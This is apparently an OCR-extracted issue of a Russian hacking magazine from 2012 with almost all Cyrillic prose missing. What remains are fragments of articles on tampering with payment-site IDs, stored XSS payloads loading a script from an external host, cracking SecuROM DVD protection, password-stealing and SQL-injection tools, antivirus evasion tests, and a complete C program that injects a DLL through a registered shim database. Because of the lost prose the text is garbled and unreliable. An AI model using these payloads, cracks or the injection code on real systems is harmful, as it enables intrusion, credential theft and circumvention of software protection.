es.dwCookie = (DWORD_PTR)&lps;
SendMessage(hRich, EM_STREAMIN, SF_RTF, (LPARAM)&es);

04 /159/ 2012


mrahistory_ . ,
16*count_emails (, 1
000 ~15 ). ,

, :
int id_message=emails[k].id->id1;
for(int i=0;i<emails[k].id->count_messages;i++)
{
_message*mes=(_message*)(mra_base+
offset_table[id_message]);
wchar_t*str=(wchar_t*)((unsigned char*)mes+
sizeof(_message));
...
id_message=mes->prev_id;
}

FILETIME,

FileTimeToSystemTime. RTF
Rich Edit
WordPad. , ,
message. , ,
.

P.S.
,
,
. , (exe , , 2
) C-,
hex- .
,
ICQ-, mra.dbs.
Mail.Ru, -, Mail.Ru ,
-, , -,
, . z

063

Daeren Torn

064

WARNING


. ,



,

.


, .

.


. , .

04 /159/ 2012


,

. !

*****09 : -85 |
*****61 : -71 |
*****60 : 0 |

. 31 ,
. ,
,
( - ? . )?
Webmoney ,
, . ,
, html, .
, - :).

, . Epic fail.
, , ,
html- .
, input-:
m_from m_to. , ! :
ID? , : m_from,
, .
ID .
, .
! , , ,
, , . ,
-85 , 290!
( ), , . , ,
ID . , ! ,
. ,
, ,
.
.


?

Opera
disabled ( , ).
:

, .
, .

/ , ,
.
, . , ID.
:

*****09 :
*****61 :
*****60 :

<input type=button value='' name=show_orders_list


onClick='showPay(this.form, ***39)'>

15 |
-71 |
-100|

04 /159/ 2012

065


ID ,
: ID!
. ,
. ,
,
: , (.) .

, !
, , ? , . ID JS. ,
.
, ID
//
:).
.
, ,
Charles (charlesproxy.com ,
- ). , . IE
ieHTTPHeaders,
.
ieHTTPHeaders :
POST /client.php
xjxfun=changeChack&xjxargs[]=***18&xjxargs[]=***39&
xjxargs[]=120.0

: 1 , 2
, 3 .
GET-
. , . , ,
JS ? ,
}{0@): - -?
? !.

- ?
, .
html- : js/func.js. ,
,
.
saveNewPass() ID+JS.
, . , , ,
. , (
)? ,
IP
!

, , ,




.
066

Basic Authentication. ,
. ,
,
, ,
...
IT , .
, ,
:).


, , , - .
, ID, .
. ,

, ,
-. ,
, . ,
.
, : e-mail
?. : + IP. ,
. :
<a href="JavaScript: edit_post(***01, ***1)"
class=z11><font class=z11></font></a>

, 3, ,
! , ,
. , ,
. , ,
. , !
.
,
:
<script language='JavaScript' src='js/hd.js'></script>

, js/hd.js

04 /159/ 2012

. showTiket(n).
, .
, ,
. , IP!
,
,
, , : (...) , ,
. ! ,
.

XSS?
, , , . .
, XSS.
, ( ).
,
, , (e-mail,
SMS-)
. , ,
/ , e-mail
.
:
<script src="http://***/o.js" type="text/javascript" >
</script>

,
e-mail. , IE ,
ieHTTPHeaders:
POST /client.php HTTP/1.1
...

xjxfun=saveEmail&xjxr=1328363403426&xjxargs[]=TEST
xjxfun=saveTel&xjxr=1328363361153&xjxargs[]=000000000000
xjxfun=saveSMSTel&xjxr=1328363389834&
xjxargs[]=000000000000

xjxr, GET-,
, . e-mail:
/client.php?xjxfun=saveEmail&xjxargs[]=
<script src="http://***/o.js" type="text/javascript" >
</script>

o.js alert(XSS);. !
.

alert. XSS ?
, .
:
/client.php?xjxfun=saveTel&xjxargs[]=000000000000
<script src="http://***/o.js" type="text/javascript" >
</script>
/client.php?xjxfun=saveSMSTel&xjxargs[]=000000000000
<script src="http://***/o.js" type="text/javascript" >
</script>

! ,
, - . , , , 260 , .


IT- , 2008 .

.
, . ,

,
, . ,
. z
XSS

04 /159/ 2012

067

elf (icq: 7719116)


cj (icq: 3708307)

DVD

SecuROM
v7.33.17
, OllyDbg
-7, Xcode injection
,
, ,




OEP.

068

-

:

Tiberium Wars
Command & Conquer
Electronic Arts.
Sony Digital Audio Disc Corporation
(SONY DADC), ,
, SecuROM,
.

:


;
SecuROM_7 Profiler
v1.0;

SecuROM 7
& VM;
X-code
injection (txt-bin);
X-code
injection
!

SecuROM
,
(exelab.ru
). ,
Sony ,
Protection Technology
,

04 /159/ 2012

,
.
. ,

. ! ,
OEP
. , ,
SecuROM 7.33.
7.3x , (
: <space for rent>
You Are Now Entering a
Restricted Area).
,
.
! !

KeBugCheckEx.

.
, ,

, :).

WHAT IS TARGET
. , Tiberium Wars ( 1.9),
OllyDbg 1.10 OllyDmp
( ) OllyDbg 2.0
- .
,
,
.
, .
.

CNC3.exe: , Microsoft C++ 7.0,
.text, .rdata , ,

. , Daemon
Tools ,

, , .

CnC, , CNC3.exe
WinAPI CreateProcess
.dat (
Microsoft PE EXE format) . ,
\RetailExe\1.9\cnc3game.
dat.
.securom , .
F9
.
,
API-, ProcMon ,

04 /159/ 2012

WindowsNT\CurrentVersion\Windows\AppInit.
, ,
. ?
,
, ,
.
, CreateFile, FindWindow
.
;
. ,

.
,
( ).
, (
, , ). .
, CNC3.exe
Microsoft C++ 7.0. ,
cnc3game.dat . :

OEP

. !

: ,
. ,
,
, , ,
(
).
,
,
X- .
, X- ,

.
:
1. On-line patching. WinAPI
ReadProcessMemory/WriteProcessMemory
/
. , ,
NtExplorer
AsPack 2.11c,
. Themida
.
2. Offline patching. .
, ,
.

.
,

GetCommandLine/GetFilePath
.
3. Dll-hijacking. ,
,
(,
DllMain),

.


004626FAh.
004784B8h
, .
, API (GetSystemTimeAsFileTime,
GetCurrentProcessId).
: GetSystemTimeAsFileTime
X-, ,

OEP ,
,
.
SecuROM 7.33
WinAPI,
,
.
! .
.est
asm-,
.

,
HKLM\Software\Microsoft\

004628DA
004628DF

CALL 004784B8
JMP 004626FA

069


. :
GetSystemTimeAsFileTime
. ,
( , .text)
, . , ,
kernel32.
text ( ), 2k3
PeTools Write,

! , ,
WinAPI VirtualProtect, .
.

. , large
integer ACSIIZ- ( ltoa
), MessageBox,

WinAPI. ,

CreateThread 00F9AD0E,
. , ,
! -.
. MessageBox
: 00DDCE77, 76B414D4, 7C34207B,
0040A5AE -! ,
.text! We need attach
now! 1.10,
, . ,
OEP (
0040A2C7). ,
(VM) -
, (
SONY DADC) OEP

. ,
? SecuROM v7.33 Virtual Machine,
, !

SECUROM V7 VIRTUAL MACHINE


Sony DADC :
OEP
,
.
, ,
! ,
VM,
,
,
, ,
VM, ,
MOV EAX, 1; CPUID;
MOV AL, CURRENT_CPUID_KEY_
DELTA_DECODE 254 .

070

LINK
bit.ly/x4iBzF


SecuROM
7.30.


,

,

.

VM

,
VM
.
bit.ly/xG9Lry
NoDVD CnC3:
Tiberium Wars v1.9.

.memory
.

, SONY DADC
!

,
.
VM
,

,
SecuROM v7.3x VM
,
- . :

(LPDWORD VOID) .
.
-, , ,

( spin- JMP EAX),
, , ,
.
REP
.
MOV
MOV
MOV

STOS DWORD PTR ES:[EDI]


DWORD PTR DS:[EBX+4],EAX
EAX,DWORD PTR SS:[ESP]
DWORD PTR DS:[EBX+8],EAX

MOV
MOV
MOV
MOV

DWORD PTR DS:[EBX+0C],EDX


BYTE PTR DS:[EBX+10],95
DWORD PTR DS:[EBX+14],EBX
DWORD PTR DS:[EBX+1C],ESP

, ,
,
VM. ,
VM 90% ! -, ,
copy/paste. -,
CPU . ,

! , , ROL- (crypt-byte),
,
255
,

. , ,
-
.
VM ?

04 /159/ 2012

, !
, .
( 2),
. 2

,
,
.
(, 1),
(offset 00B93AFC), VM. EAX
- (0790A442),
.
(0790A442)
, EAX 1,
,
(offset 00B93AFC). , ,
. ,
VM : -
MOV
MOV
MOV
AND
MOV

ECX,
ECX,
EAX,
EAX,
ECX,

DWORD PTR SS:[EBP+8]


DWORD PTR DS:[ECX]
DWORD PTR SS:[EBP+0C]
ECX
EAX

NOP
.
VM, ( ).
1 1.
, ,
VM
WinAPI, ( ,
-,
).
WinAPI , : SetUnhandledExceptionFilter,

SecuROM v7.33.017 , X-

GetModuleFileNameA, DeleteFileA, GlobalFree.


VM CALL EAX,
.

WinAPI. (

10k). :
1. . ,

,
.
!
2. 255 (
1
50),
++ ,
,
VM
(XOR SecretDATA,

43E2AB9D) .
.
1 VM: CALL ANY_OFFSET JMP DWORD
PTR DS:[ ] JMP [VM_VIRTUAL_ADDRESS] VM.

VM .
, JMP DWORD
PTR DS:[ ]
. ,
, VM, ,
(LPDWORD
VOID). VM

!
VM
,
, ,
. , !
, ,
1 1,
3k, 2 30k.

.

,
0044F4D2
0044F4D8
00482DE5
00482DEF

DEC DWORD PTR DS:[158297A]


JE NODVD.00482DE5
MOV DWORD PTR DS:[158297A],18D
JMP NODVD.0044F4DE

Sony
DADC. .

OEP ! VM xD

04 /159/ 2012

SONY
DADC ( )!
][. z

071

X-Tools


:
slider
URL:
bit.ly/yMgiB6
:
*nix/win

:
garinn
URL:
ripper.zu8.ru
:
Windows

:
The SX Team
URL:
bit.ly/ht8krs
:
Windows

- ADSL-
BVSCANNER


SQL-

BVScanner (Black Vlastelin Scanner)


,
Perl.

ADSL-.
.
,

accounts.txt.

SQLRipper
,
,
SQL MySQL MSSQL.

:
( :) .

. ? , ,
! Browser Password Decryptor.

: Firefox, Internet
Explorer, Google Chrome, Google Chrome Canary,
Opera Browser, Apple Safari, Flock Browser.

:
perl bvscanner.pl
> IP-
> IP-

, ,

.

:

;
;
PPTP-VPN ,
;
,
,
, .

072

:

;
;
SQL-;
SELECT c ORDER BY,
GROUP BY, UNION SELECT;
;
IDS;

.dbf;
XML-;
.dbf.
,

(bit.ly/ydHA2o) ,

.

:
command-line GUI- ;

;
;

;
HTML/XML/Text;
Portable,
.
: BrowserPasswordDecryptor.exe
<output_file path>.

04 /159/ 2012

X-Tools

:
Mesut Timur
URL:
code.google.com/p/
finddomains
:
*nix/win

FINDDOMAINS
FindDomains
.

, ,
,
, IP-
( ).
FindDomains ,


.
Bing,
-

:
The SX Team
URL:
bit.ly/ihELsw
:
Windows

:
Anton Keks
URL:
angryip.org
:
*nix/win/mac

4
ANGRY IP SCANNER


,
Angry IP Scanner ( ipscan).

IP-
.

,
, MAC-,
.
, (
java) .

NetBIOS ( ,
Windows-),
-, CSV-, TXT- XML- .
,

(, 192.168.0.1 192.168.0.255)

, .
,

.

04 /159/ 2012

Bing
Developers. :
binged.it/6Acq5, ID
appid.
txt, .
:
1000 Bing;

DNS;
;
Mono.
:
FindDomains.exe www.google.com

:
s3my0n
URL:
bit.ly/w87YuA
:
*nix/win

5
PE-

PE-.
-
GUI-,
. ExeScan
Python, .


.

, ,
, nonascii/ .
:
PE;
;
API ;
PE ;

.
PEFile
. . : exescan.
py -a <path to exe file.

6
EXPLOIT-DB.COM

,

exploit-db.com.
getsploits (,
) !
/
-/
,
.
:
o: ;
q: ;
h: .
:
--author: ;
--platform: ( 47 );
--type:
--osvdb: OSVDB- ;
--cve: CVE- .
:
getsploits.py -o linux_shellcode.txt
--type shellcode
getsploits.py -o freebsd_x86-64_local.
txt --platform 10
getsploits.py --author maxe vbulletin

073

MALWARE

(drobotun@xakep.ru)

074

? . , :

drive-by
,



(

).
!


:


04 /159/ 2012

NDIS-, Avast


,
.
. ,
,
.
, ?
,
?
,
. , ,
,
. , ,

, ,
, .
, . ,

, , ( ,

).

:) .
,
, ,
.

, .

: , , ,
. ,
, ,

, .

IoCreateDevice DrWeb, TdiRegisterDeviceObject tdi.sys

04 /159/ 2012


Windows .
ws_32.dll,
Winsock (send, recv,
connect ). (
) ,
,
,
.
-
,
,
, -, ws_32.dll,
, ,

.
ws_32.dll afd.sys
(Ancillary Function Driver for WinSock ),

( ,
). ,
ws_32.dll afd.sys. ,
afd.sys ws_32.dll
msafd.dll .
,
,
afd.sys, .
,
tcpip.sys,
tcp/ip.
( ) TDI
(Transport Data Interface ). ,
, nwlnkipx.sys, ipx.

inf- klim6.sys

075

MALWARE

NDIS- Comodo () OutPost FireWall Pro 7.0 ()


\Device\RawIp, \Device\Udp \
Device\Tcp ( IPv6 \Device\
RawIp6, \Device\Udp6, \Device\Tcp6 ).
IoAttachDevice,
,
IoCreateDevice ,
.
. ,

, Dr.Web,
tcpip.
sys.

TdiRegisterDeviceObject tdi.sys, .
, ,
NDIS (Network Driver Interface
Specification
).

BHO Internet Explorer

076

,
, NDIS-, ,
.

. .
( Microsoft )
NDIS Intermediate Driver
( NDIS).
( ) , ndis.sys.
Filter Hook Driver (
) kernelmode ,
IP. Microsoft


. -

, -
.



(, ,
,
, -
).

,
,
, .
NDIS- :
, Windows XP,
(NDIS 5),
NDIS- Windows
Vista (NDIS 6).

-. ,
,
,
, NDIS. ,

, ,

. : ,
, ,
(
),
( ).
-
,

, ,
inf- -

04 /159/ 2012

.
- inf-
: -,

, -, . ,
, , .

NDIS- ,
,
NDIS-.
, ,

NdisOpenAdapter NdisRegisterProtocol.
,
, , . ,
, Comodo,

NDIS- NdisOpenAdapter, NdisRegisterProtocol,
NdisCloseAdapter NdisDeregisterProtocol.

NdisOpenAdapter,
.
, - ,
.



, NDIS, .

, - java-
(
drive-by

Java- http-

04 /159/ 2012

,


,
) .


. BHO
(Browser Helper Object
). BHO
dll-, Internet
Explorer. , BHO

, .
BHO , ,
- .
, , , BHO Internet
Explorer? -,
. -,
( ) ,
,

.

-

, ,
,
.
, -
Java-, -
.
,
, ,
.
-
, ,
.
, ,
,
-,
,
,
.

( ). , html- , iframe (,


).
(
),

Java- Trojan-Downloader.Js.Agent.
ghd (, , )

077

MALWARE
WWW
NDIS
vitki.net/
ru/story/vvedenie-vndis ( )
msdn.microsoft.
com/en-us/library/
ff564881 ()

DVD



.

Java- ,

. ,
iframe .
,
,

.
Java- ,
DLL- jscript.dll.
%windir%\system32, COM- IE JS. Windows GUID ( )
COM-
Jscript. {f414c260-6ac0-11cfb6d1-00aa00bbbb58}, {f414c261-6ac0-11cfb6d1-00aa00bbbb58} {f414c262-6ac0-11cfb6d1-00aa00bbbb58}.
, ,

JavaScript. ,
jscript.dll.
,
.
,
, ,
JavaScript- Windows.

ntdll.dll, SandboxIE
( SbieDLL.dll)


. ,
,
.
,
.
.



.

. ,


.


. , ,
,
.
,
.
,
. -





078

, (SandboxIE,
BufferZone,
Kaspersky Internet Security, Comodo Internet
Security Pro, Avast Internet Security).


,
.
,
- .


. Windows User
Account Control (
Windows).
, ,

SandboxIE.

,
, ( ).
.
,

. ,

/ - ,
- , .
,


.
,
, , -

04 /159/ 2012

. , SandboxIE
56 ntdll.dll, 68
user32.dll, 71 advapi32.dll, 6 kernel32.dll 1 ws_32.dll.

, .

.



, .
SandboxIE, BufferZone.


SandboxIE

.
( Kaspersky
Internet Security Comodo Internet Security
Pro).
,

.


.

. , SandboxIE
( ) ,
.

Comodo Internet
Security

.

.

,
,
- ,

, . ,
, - ,

,
. z

SandboxIE ( drive , )

INFO



, ,
-
.
,

.
,
,


.
-. Microsoft Security Essential
DSS (Dynamic Signature
Service).
( ,
),
, ,

Microsoft DSS, SpyNet MRS (Microsoft Reputation Services).
, ,

04 /159/ 2012

, .

, ,
.
Comodo
,

.

,
Kaspersky Security Network. KSN ,

-,
. KSN

-,
, (

) -,
KSN -.



,

. ,

, :
Program
Files, Windows,
Users\%AllUsersProfile%\Program
Data, Documents
and Setting
HKLM\
Software.

Java-

JavaScript:

][
2011 .

079

MALWARE

deeonis (deeonis@gmail.com)

,
,
. ,
.
,
,
.

,

. , ,
, .
,

,
.
,

,
.
, . : Kaspersky CRYSTAL, Dr.Web Security
Space, ESET NOD32 Smart Security 5 Avira Free
Antivirus.
(, , )
.

Avira ,

-

080

.
,

IE6,
web-.


Windows XP sp3 ,
,

,
.

,
.

.
-
-
hex-
.
swf-, Visual Basic Script,
Java-, exe-

( UPX) lpe, pdf,


zip-. .

.

.
, , .
.
,
. ,
.


, ,
, .
, Avira Free Antivirus.
,
,

,
.

04 /159/ 2012

Dr.Web

Kaspersky : total detection

, ,
.
,
.
. ,

Scan.
, ,
.
Avira , DR/
Delphi.Gen. ,

,
. , , ,
. 1/10 , ,
- .
Dr.Web Security Space.

. ,
, .
DR/Delphi.Gen,
Trojan.MulDrop.20121. ,

,
. 20121, ,
,
20992 .
,

04 /159/ 2012

, ,
, .
.

pdf,
(Exploit.PDF.2633),
Flash Exploit.SWF.193. ,
swf-,
.
,
- ,
. Avira Free
Antivirus ,
(, ,
).
,
. Trojan.
MulDrop.20121
.
, Dr.Web
, , ,

. Kaspersky
CRYSTAL. , ,
,
.

,
.
, ,
,
.
DR/Delphi.Gen,

(HEUR:Trojan.Win32.
Generic). -
. pdf-,
,
HEUR:Exploit.Script.Generic. ,
,
,
, .
,
,
,
2/10.
NOD32.

. , , ,
exe-,
.
Win32/Injector.FP. ,
, ,
: 1 10
.


, ,
,
.

. , ,

081

MALWARE

NOD32 Avira

Avira Free Antivirus

NOD32

. ,
,

. ,
Avira pdf-,
,
. JS, ,

, HTML/Dlcr.
Dawn.C.2. exe, swf-
.
Avira Free Antivirus .
Dr.Web. ,
.
:
,
Trojan.SMSSend.1950. .
.
,
,
-

,
.
Kaspersky Crystal ,

,

. ,
, , ,

.
ESET NOD32 , . ,
, exe-,
.

.

Avira ESET ( ,
,
).

, ,

600%
,
.
, 10/10
. ,
( ),

.
Dr.Web
:
.
,
, .
-,

. z

,
,
,
.

?
,
.

, .
.
VBS,
. ,
, , CVE201-0611. -, ,
JS, .
winlocker' , ,

082

.
,
, .
,
( -
).
PDF-,
- drive-by . ,
,
, flash-,
.

04 /159/ 2012

Preview

088

TRUE-

,
.

TrueCrypt,
.
,
,
.

,
. ,
- .

084

SHIM:
. Shim Engine,
.

UNIXOID

106


Linux
2.6
sysfs.
?

SYN\ACK

122


HOWTO:

Samba.

04 /159/ 2012

111


Android ,
firmware
CyanogenMod MIUI.

FERRUM

128


Microsoft
. 2012.

139


, ,
.
.

083

TSS (TSS_TSS@mail.ru)

SHIM:

SHIM ENGINE


, dll,
dll redirection, ,
apc LoadLibrary. ,
. ? .

SHIM ?
Shim Engine
Windows , dll, PE-
ntdll.dll.


:
some.exe
Windows95
Windows 95

? , ,
dll ,
- . -

084

some.exe.
Windows
API.
,
PEB,
Heap Managera.
, , ,
ADVAPI32.DLL:
RegConnectRegistryA, RegConnectRegistryW, RegOpenKeyExA,
RegOpenKeyExW, RegQueryValueExW,RegCloseKey,
RegOpenKeyW, RegQueryValueA, RegQueryValueW,
RegCreateKeyA, RegCreateKeyW, RegCreateKeyExA,
RegCreateKeyExW, RegEnumValueA, RegEnumValueW,
RegEnumKeyA, RegEnumKeyW, RegEnumKeyExA, RegEnumKeyExW,
RegQueryInfoKeyA, RegQueryInfoKeyW, RegSetValueExA,
RegSetValueExW, RegDeleteKeyA, RegDeleteKeyW

04 /159/ 2012

Shim:

EMET

, Shim Engine ,
.

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\
CurrentVersion\AppCompatFlags\Layers]
"C:\\Documents and Settings\\Admin\\ \\test.
exe"="WIN2000"


,
.
SHIMENG_DEBUG_LEVEL 4
(
).
(
, test.exe)
, , Windows 2000 WinDbg,
. , :
[INFO] [SeiSetLayerEnvVar] Env var set __COMPAT_LAYER="Win2000"
...
[INFO] [SE_DllLoaded] INIT. loading DLL "AcLayers.DLL".
...
[MSG ] [SeiInit] Shim DLL 0x71660000 "C:\WINDOWS\AppPatch\
AcLayers.DLL" loaded
[MSG ] [SeiInit] Using SHIM "Win2000VersionLie!AcLayers.DLL"
...
[INFO] [SeiInit] GetHookAPIs returns 3 hooks for DLL "C:\
WINDOWS\AppPatch\AcLayers.DLL" SHIM "Win2000VersionLie"
[MSG ] [SeiInit] Using SHIM "VirtualRegistry!AcLayers.DLL"
[MSG ] [SeiInit] Command line for Shim "VirtualRegistry" :
"WIN2K"
[INFO] [SeiInit] GetHookAPIs returns 27 hooks for DLL "C:\
WINDOWS\AppPatch\AcLayers.DLL" SHIM "VirtualRegistry"
[MSG ] [SeiInit] Using SHIM "DuplicateHandleFix!AcLayers.DLL"
[INFO] [SeiInit] GetHookAPIs returns 1 hooks for DLL "C:\
WINDOWS\AppPatch\AcLayers.DLL" SHIM "DuplicateHandleFix"
[INFO] [SE_DllLoaded] INIT. loading DLL "AcGenral.DLL".
...
[MSG ] [SeiInit] Using SHIM "LoadLibraryCWD!AcGenral.DLL"
[INFO] [SeiInit] GetHookAPIs returns 0 hooks for DLL "C:\
WINDOWS\AppPatch\AcGenral.DLL" SHIM "LoadLibraryCWD"
[MSG ] [SeiInit] Using SHIM "Win2kPropagateLayer!AcLayers.DLL"
[INFO] [SeiInit] GetHookAPIs returns 3 hooks for DLL "C:\
WINDOWS\AppPatch\AcLayers.DLL" SHIM "Win2kPropagateLayer"

, Win2000,
shim dll C:\WINDOWS\ AppPatch\ AcLayers.DLL.
,
Vir tualRegistr y, DuplicateHandleFix ,
( ,
).
:

04 /159/ 2012

, , test.exe Win2000. , ,
. .
,
(!) .
. , , .
AppCompatFlags . .


, , Shim Engine shimeng.dll apphelp.dll, sysmain.
sdb drvmain.sdb ( \WINDOWS\AppPatch),
dll ,
PE-
Windows. , ntdll.dll. ,
, ,
Shim Engine, ,
apc-.

PE-:
_LdrpInitializeProcess:
.text:7C921B36
mov
.text:7C921B3C
mov
...
.text:7C921B62
lea
.text:7C921B68
mov
...
.text:7C921B87
mov
...
loc_7C921693:

eax, large fs:18h ; TEB


ebx, [eax+30h] ; PEB
eax, [ebx+1E8h] ; peb->pShimData
ecx, [eax]
[ebp+var_104], ecx

...
.text:7C921693
mov
edi, [ebp+var_104]
.text:7C921699
xor
esi, esi
.text:7C92169B
cmp
edi, esi
.text:7C92169D
jz
loc_7C923CD0
; ULONG peb->pShimData == 0,
; (
; )

085


s = idautils.Strings( False )
s.setup( strtypes = Strings.STR_UNICODE | Strings.STR_C )
for i, v in enumerate( s ):
if v is None:
print( "Failed on %d" % i )
else:
print( "%x => %s" % ( v.ea, str( v ) ) )
print "Script Started..."
EnumStrings()
print "Script Ended..."

idautils.Strings(False)
True, , default_setup = False setup .
IDA ,
:
5d0749b0 -> \Registry\Machine\Software\Microsoft\Windows
NT\CurrentVersion\AppCompatFlags\InstalledSDB

xref SdbResolveDatabase, DatabasePath


DatabaseType. , ( !) ,
GUID ( ,
).
, {GUID} (DatabasePath
DatabaseType)
.

WinDbg

.text:7C9216A3
.text:7C9216A4
.text:7C9216AA
.text:7C9216B0
.text:7C9216B1
;

push
edi
push
[ebp+var_D8]
mov
[ebx+1ECh], esi
push
edi
call
_LdrpLoadShimEngine@12

LdrpLoadShimEngine
shimeng.dll.
LdrpLoadShimEngine dll,
(LdrpGetShimEngineInterface),
(SdbInitDatabase), (SdbUnpackAppCompatData)
. , shimeng.dll. dll ,
, -
, ,
? . (IdaPython):
import idaapi
import idautils
import idc
def EnumStrings():

086

, , , , .
, , , .
, - ?
, !
- ,
, . , , EMET (goo.gl/9Dn5L). ,
Process Monitor ,
, EMET, C:\
Program Files\EMET\EMET_GUI.exe, Configure Apps,
test.exe, EMET.
, EMET C:\WINDOWS\
AppPatch\Custom\{f8c4cc07-6dc4-418f-b72b-304fcdb64052}.
sdb, dll C:\WINDOWS\AppPatch\EMET.dll.
. SOFTWARE\\Microsoft\\
Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\\test.
exe , ,
SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\
AppCompatFlags\\InstalledSDB\\{f8c4cc07-6dc4-418f-b72b304fcdb64052}.
, Layers, Custom. .
hex-, emet.dll test.dll. test.dll C:\WINDOWS\AppPatch\. test.exe
, test.dll test.exe.
vmmap (goo.gl/SsSQn)
. test.exe vmmap dll, mission
complete!

04 /159/ 2012

Shim:


, ,
dll ( ,
. ):
#include <windows.h>
#include <iostream>
#define GUID L"{f8c4cc07-6dc4-418f-b72b-304fcdb64052}"
#define SHIM_REGKEY L"SOFTWARE\\Microsoft\\Windows NT\\
CurrentVersion\\AppCompatFlags "
BOOL RegisterShimDll()
{
HKEY key;
BOOL funcResult = FALSE;
wchar_t dbPath[] = L"C:\\Windows\\AppPatch\\Custom\\"
GUID L".sdb";
DWORD dbType = 0x10000;
DWORD64 sdb = 0x1cc8828b2208e82;
// Custom AppCompatFlags
RegCreateKeyEx(HKEY_LOCAL_MACHINE,
SHIM_REGKEY L"\\Custom", 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL,
&key, NULL);
RegCloseKey(key);
//
RegCreateKeyEx(HKEY_LOCAL_MACHINE,
SHIM_REGKEY L"\\Custom\\test.exe",
0, NULL, REG_OPTION_NON_VOLATILE,
KEY_WRITE, NULL, &key, NULL);
RegSetValueEx(key, GUID L".sdb", 0,
REG_QWORD, (PBYTE)&sdb, sizeof(DWORD64));
RegCloseKey(key);
RegCreateKeyEx(HKEY_LOCAL_MACHINE,
SHIM_REGKEY L"\\InstalledSDB",
0, NULL, _OPTION_NON_VOLATILE, KEY_WRITE, NULL,
&key, NULL);
RegCloseKey(key);
RegCreateKeyEx(HKEY_LOCAL_MACHINE,
SHIM_REGKEY L"\\InstalledSDB\\" GUID,
0, NULL, REG_OPTION_NON_VOLATILE,

Dll

KEY_WRITE, NULL, &key, NULL);


RegSetValueEx(key, L"DatabasePath", 0,
REG_SZ, (BYTE*)dbPath, sizeof(dbPath));
RegSetValueEx(key, L"DatabaseType", 0, REG_DWORD,
(PBYTE)&dbType, sizeof(DWORD));
RegCloseKey(key);
return TRUE;
}
BOOL CopyShimFiles()
{
CreateDirectory(L"C:\\Windows\\AppPatch\\Custom", NULL);
CopyFile( GUID L".sdb",
L"C:\\Windows\\AppPatch\\Custom\\" GUID L".sdb",
TRUE );
CopyFile( L"test.dll",
L"C:\\Windows\\AppPatch\\test.dll", TRUE );
return TRUE;
}

int main()
{
CopyShimFiles();
RegisterShimDll();
std::cout << "Shim inject complete... " << std::endl;
std::cout << "Run test.exe and use vmmap.exe to see
test.dll in AP test.exe" << std::endl;

SHIMENG.DLL
shimeng.dll :
SE_DllLoaded dll;
SE_DllUnloaded dll;
SE_DynamicShim ;
SE_GetProcAddress GetProcAddress;
SE_InstallAfterInit
;
SE_InstallBeforeInit ,
;
SE_IsShimDll dll;
SE_ProcessDying ,
, dll
DLL_PROCESS_DETACH.

04 /159/ 2012

return 0;
}

shim engine ,
.
-, .
-, , , explorer.exe,
.
-,
,
. z

087

Johnny Catch (johnny.catch@gmail.com)

TRUE


TRUECRYPT
, -
,
TrueCrypt.
,
,


. ,
.
TrueCrypt
, ,
.

, .
,
, .
,
. ,
TrueCrypt.

TrueCrypt

088

, , .
,
truecrypt.org (
7.0a). MS Visual Studio 2010 ( ,

04 /159/ 2012

True-

.
128 128, 192 256 . 256- .

TrueCrypt :
,
,
.
BelT :
void belt_init(unsigned __int8 * k, int kLen,
unsigned __int8* ks)
{
for(i = 0; i<32; ++i) ks[i] = k[i];
}

BelT

MS VS 2008 SP1). 16-


Microsoft, MS Visual C++
1.52. MSDN,
:). , 16-
,

- .
, Visual C++ 1.52
.
NASM, gzip, WinDDK, PKSC#11 ( RSA Data Security).
,
.
:
1. MSVC16_ROOT , MSVC15,
Microsoft Visual C++ 1.52;
2. WINDDK_ROOT , , WinDDK;
3. PKCS11_INC , PKCS#11.
PATH, exe NASM gzip. .
PATH
, C:\ gzip.exe. , . ,
TrueCrypt: ,
Visual Studio ( ), All Build. ,
Release TrueCrypt.
.


BelT,

04 /159/ 2012

,
, ,
(
TrueCrypt MAX_KEY_LENGTH
key schedule ,
TrueCrypt).
belt_init .
-, ,
32 , kLen ( assert).

. Cold
Boot Attack,

,
.
(
). ,
:
// (SBox)
unsigned __int8 H[256] = {...};
//
unsigned int KeyIndex[8][7] = {...};

H , ( 34.101.31-2011), . :
#define HU1(x,H) (((unsigned __int32) (H)[ U1((x)) ]) < < 24)
#define HU2(x,H) (((unsigned __int32) (H)[ U2((x)) ]) << 16)
#define HU3(x,H) (((unsigned __int32) (H)[ U3((x)) ]) << 8)

XTS
XTS
TrueCrypt. ,
XEX, 2003
. , XEX
,
XTS . 2010 XTS
NIST
. 2007
IEEE (IEEE 1619). XTS
.

089


#define HU4(x,H) (((unsigned __int32) (H)[ U4((x)) ]))
#define G(x,H,r) RotHi(HU4((x),(H)) | HU3((x),(H)) \
| HU2((x),(H)) | HU1((x),(H)),(r))

HU
DWORD, G
. (
).
:
void belt_encrypt
(
unsigned __int8 *ks,
unsigned __int8 * inBlock,
unsigned __int8 * outBlock
);

.
DWORD,

, , . BelT
28147-89.

TrueCrypt.

TRUECRYPT
, MSVS 2010 TrueCrypt
Crypto,
, .
BelT. (, Mount)
Crypto.h :
enum {
NONE = 0,
AES,
...
};


.
BELT, #ifndef TC_WIN...,

TrueCrypt


. , key schedule ( ,
, ,
32 ):
#define BELT_KS 32

#ifdef TC_WINDOWS_BOOT_
SINGLE_MODE.
key shedule ,
.
:
#elif defined(TC_WINDOWS_BOOT_BELT)
#define MAX_EXPANDED_KEY BELT_KS
#endif

include BelT (#include "Belt.h"). Crypto.h


.
Crypto.c, Ciphers[] Cipher.
#ifndef TC_WIN... :
{ BELT, "BelT ( 34.101.31)", 16, 32, BELT_KS },

34.101.31-2011
BelT,
34.101.31-2011, ,
. Belt
128 128, 192 256
.
28147-89

2^32, (
)
.
: , Belt
SP-.
,
:
2^32, XOR, .

090

,
. 128
32- , .
K , 56
. 256-
(k[1],..., k[8]) :
K[1]=k[1], ..., K[8]=k[8], K[9]=k[1], ..., K[56]=k[8]

.
1,
i. G 32-
H
.
.

04 /159/ 2012

True-

BelT

XTS

Cipher
, , , key shedule .
EncryptionAlgorithms[]
EncryptionAlgorithm. -
, TC_WINDOWS_BOOT,
.
( ):

34.101.31 (
),
XTS, CRC32 .
,
.

{{ BELT, 0 }, {XTS, 0, 0, 0}, 1}

(
),
XTS (
), ,
(
TrueCrypt).
.
CipherInit, ,
,
. key
schedule , ,
:
case BELT:
belt_init(key, ks);
break;

EncipherBlock
( ),
DecipherBlock ( ). , (
),
Belt.
, ,
, TrueCrypt,
bootloadera
BelT.
,
( ).
,
: ,

04 /159/ 2012

28147-89
